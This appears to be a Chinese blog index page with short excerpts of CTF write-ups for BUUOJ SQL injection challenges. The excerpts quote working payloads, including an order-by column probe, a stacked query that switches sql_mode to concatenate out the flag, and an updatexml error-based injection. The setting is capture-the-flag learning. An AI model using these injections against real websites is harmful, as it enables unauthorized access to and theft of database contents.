摘要:
题目考察了字符绕过,注释符绕过,sql双写绕过 http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 order by 3%23&password=admin . 可以看到or和b 阅读全文
摘要:
好吧这题是我不配 看了网上大佬的WP payload1:*,1 大佬的解法,好像直接将源码猜出来了 select $_GET['query'] || flag from flagpayload2:select 1;set sql_mode=pipes_as_concat;select 1||flag 阅读全文
摘要:
万能密码登入 尝试解密MD5,解密失败尝试其他注入思路 http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123 有回显 http:/ 阅读全文
摘要:
使用updatexml报错法注入 http://1bfb9fee-1fce-4f07-81b1-c8048e473a66.node3.buuoj.cn/check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23 阅读全文